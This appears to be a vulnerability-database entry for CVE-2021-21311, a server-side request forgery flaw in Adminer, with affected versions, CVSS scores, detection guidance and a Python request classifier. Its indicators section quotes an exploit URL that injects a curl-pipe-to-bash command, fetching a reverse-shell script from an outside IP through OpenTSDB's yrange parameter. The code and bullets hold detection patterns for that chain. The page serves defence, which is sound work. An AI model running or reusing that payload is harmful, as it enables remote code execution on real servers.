CVE-2021-21311
published 2021-02-11

CVE-2021-21311: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery…

Priority: P1, 85 (high)
CVSS 3.1: 7.2 (AV:N / AC:L / PR:N / UI:N / S:C / C:L / I:L / A:N)
CISA Known Exploited Vulnerability, due 2025-10-20
Exploited in the wild
EPSS: 90.46% (99.8th percentile)
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.

Affected

12 ranges

Vendor   Product       Version range                   Fixed in
adminer  adminer       >= 0 < 4.7.9-1                  4.7.9-1
adminer  adminer       >= 0 < 4.7.9-1                  4.7.9-1
adminer  adminer       >= 0 < 4.7.9-1                  4.7.9-1
adminer  adminer       >= 0 < 4.7.9-1                  4.7.9-1
adminer  adminer       >= 0 < 4.2.1-1ubuntu1+esm1      4.2.1-1ubuntu1+esm1
adminer  adminer       >= 0 < 4.6.2-1ubuntu0.1~esm1    4.6.2-1ubuntu0.1~esm1
adminer  adminer       >= 0 < 4.7.6-1ubuntu0.1~esm1    4.7.6-1ubuntu0.1~esm1
adminer  adminer       >= 4.0.0 < 4.7.9                4.7.9
debian   adminer       < adminer 4.7.9-1 (bookworm)    adminer 4.7.9-1 (bookworm)
debian   debian_linux  (none listed)                   (none listed)
vrana    adminer       (none listed)                   (none listed)
vrana    adminer       >= 0 < 4.7.9                    4.7.9

Detection & IOCs (extracted from sources)

URL: http://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
Path: /var/www/adminer/plugins/data/servers.php
  • The SSRF exploit works by triggering a 301 redirect from an attacker-controlled HTTP server; monitor for outbound HTTP requests from the Adminer server to attacker-controlled IPs, particularly with Authorization: Basic headers
  • The SSRF is triggered via the `server` POST parameter in Adminer login requests; detect POST requests to Adminer with non-localhost or external values in the `auth[server]` field
  • Exploitation chains the Adminer SSRF (CVE-2021-21311) with OpenTSDB RCE (CVE-2020-35476) via the `yrange` parameter containing a `system()` call; detect HTTP requests to OpenTSDB `/q` endpoint with `yrange` containing shell metacharacters
  • Adminer SSRF affects versions 4.0.0 through 4.7.8 (all-drivers bundle adminer.php); detect presence of Adminer versions below 4.7.9 via HTTP response headers or page content
  • The SSRF allows unauthenticated attackers to redirect Adminer to internal services; monitor for Adminer processes making connections to internal/RFC1918 addresses or link-local addresses (e.g. 169.254.169.254)
  • Only Adminer installations using the all-drivers bundle (adminer.php) are vulnerable; single-driver builds are not affected
  • The exploit PoC (ssrf.py) requires the attacker to run a listener HTTP server that issues a 301 redirect to the internal target; the attacker host must be reachable from the Adminer server
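The detection heuristics above (Adminer login POSTs whose `auth[server]` is not an expected database host, link-local targets such as 169.254.169.254, and OpenTSDB `/q` requests whose `yrange` carries shell metacharacters) as one small classifier. This is an added example, not code from this page or from the Adminer project; the request records, the `ALLOWED_DB_HOSTS` allowlist and the tag names are constructed, and a body-logging reverse proxy or WAF is assumed as the source of real records.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the database hosts this Adminer instance is expected to reach.
ALLOWED_DB_HOSTS = {"localhost", "127.0.0.1", "::1", "db.internal.example"}
# Shell metacharacters, or a system() call, inside OpenTSDB's yrange parameter.
SHELL_META = re.compile(r"[;|`$&(){}]|system\s*\(")

def host_of(server):
    """Strip an optional :port (and IPv6 brackets) from an Adminer server value."""
    server = server.strip()
    if server.startswith("["):                      # [::1]:9200 form
        return server[1:server.find("]")].lower()
    return server.rsplit(":", 1)[0].lower() if server.count(":") == 1 else server.lower()

def is_link_local(host):
    try:
        return ipaddress.ip_address(host).is_link_local   # e.g. 169.254.169.254 metadata endpoint
    except ValueError:
        return False                                      # hostnames are handled by the allowlist

def classify(record):
    """Return detection tags for one request record: method, url, optional form body."""
    parts = urlsplit(record["url"])
    query = parse_qs(parts.query, keep_blank_values=True)
    tags = []
    if record["method"] == "POST" and "adminer" in parts.path.lower():
        form = parse_qs(record.get("body", ""), keep_blank_values=True)
        for server in form.get("auth[server]", []):       # Adminer's login form field
            host = host_of(server)
            if host not in ALLOWED_DB_HOSTS:
                tags.append("adminer-login-unexpected-server")
            if is_link_local(host):
                tags.append("adminer-login-link-local-target")
    if parts.path.endswith("/q") and any(SHELL_META.search(v) for v in query.get("yrange", [])):
        tags.append("opentsdb-yrange-shell-metachar")
    return tags

# Constructed sample records (not real traffic); a body-logging proxy or WAF would supply these.
SAMPLE_RECORDS = [
    {"method": "POST", "url": "/adminer.php", "body": "auth[driver]=server&auth[server]=db.internal.example&auth[username]=app"},
    {"method": "POST", "url": "/adminer.php", "body": "auth[driver]=server&auth[server]=203.0.113.7:8080&auth[username]=x"},
    {"method": "POST", "url": "/adminer.php", "body": "auth[driver]=server&auth[server]=169.254.169.254&auth[username]=x"},
    {"method": "GET", "url": "/q?start=1h-ago&m=sum:http.stats.web.hits&yrange=[0:100]&json"},
    {"method": "GET", "url": "/q?start=1h-ago&m=sum:http.stats.web.hits&yrange=[33:system('true')]&json"},
]

def scan(records=SAMPLE_RECORDS):
    """Map record index -> tags, for records with at least one finding."""
    return {i: tags for i, r in enumerate(records) if (tags := classify(r))}
```

Access logs alone do not carry POST bodies, so the Adminer checks need a proxy or WAF that logs form data; the `/q` check works on ordinary access logs.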

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v3.1     7.2    HIGH      CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
nvd            v2.0     6.4    MEDIUM    AV:N/AC:L/Au:N/C:P/I:P/A:N
osv                     7.2    HIGH
vulncheck               7.2    HIGH
cisa                    7.2    HIGH
vendor_debian           7.2    HIGH
vendor_ubuntu           6.1    MEDIUM